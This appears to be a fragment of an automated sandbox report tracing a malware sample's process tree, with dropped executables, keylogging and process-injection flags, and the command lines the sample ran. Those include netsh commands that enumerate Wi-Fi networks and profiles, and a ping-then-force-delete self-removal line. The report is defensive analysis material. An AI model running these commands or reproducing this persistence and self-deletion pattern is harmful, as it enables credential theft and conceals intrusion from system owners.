    C:\Windows\SysWOW64\WindowsInput.exe (level 3)
      command line: "C:\Windows\SysWOW64\WindowsInput.exe" --install
      - Executes dropped EXE
      - Drops file in System32 directory
    C:\Windows\lsddsds\lsdds.exe (level 3)
      command line: "C:\Windows\lsddsds\lsdds.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
      - Suspicious use of SetWindowsHookEx
      C:\Users\Admin\AppData\Local\Temp\olsdd.exe (level 4)
        command line: "C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /launchSelfAndExit "C:\Windows\lsddsds\lsdds.exe" 2416 /protectFile
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Local\Temp\olsdd.exe (level 5)
          command line: "C:\Users\Admin\AppData\Local\Temp\olsdd.exe" /watchProcess "C:\Windows\lsddsds\lsdds.exe" 2416 "/protectFile"
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
  C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe (level 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"
    - Executes dropped EXE
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe (level 3)
      command line: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
      C:\Windows\system32\chcp.com (level 4)
        command line: chcp 65001
      C:\Windows\system32\netsh.exe (level 4)
        command line: netsh wlan show networks mode=bssid
    C:\Windows\system32\cmd.exe (level 3)
      command line: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      - Suspicious use of WriteProcessMemory
      C:\Windows\system32\chcp.com (level 4)
        command line: chcp 65001
      C:\Windows\system32\netsh.exe (level 4)
        command line: netsh wlan show profile
      C:\Windows\system32\findstr.exe (level 4)
        command line: findstr All
    C:\Windows\System32\cmd.exe (level 3)
      command line: "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\Vulturi\Vu.exe"
      C:\Windows\system32\chcp.com (level 4)
        command line: chcp 65001
      C:\Windows\system32\PING.EXE (level 4)
        command line: ping 127.0.0.1
        - Runs ping.exe
  C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe (level 2)
    command line: "C:\Users\Admin\AppData\Local\Temp\Omlious\frefef.exe"
    - Executes dropped EXE
    - Checks BIOS information in registry
    - Maps connected drives based on registry
    - Checks SCSI registry key(s)
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies system certificate store
    - Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\WerFault.exe (level 3)
      command line: C:\Windows\system32\WerFault.exe -u -p 1492 -s 480
      - Program crash
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
C:\Windows\SysWOW64\WindowsInput.exe (level 1)
  command line: "C:\Windows\SysWOW64\WindowsInput.exe"
  - Executes dropped EXE
C:\Windows\system32\taskeng.exe (level 1)
  command line: taskeng.exe {4063E9A0-34CA-4360-B09F-AC96096D5D3F} S-1-5-21-2513283230-931923277-594887482-1000:MRBKYMNO\Admin:Interactive:[1]
  C:\Windows\lsddsds\lsdds.exe (level 2)
    command line: C:\Windows\lsddsds\lsdds.exe
    - Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads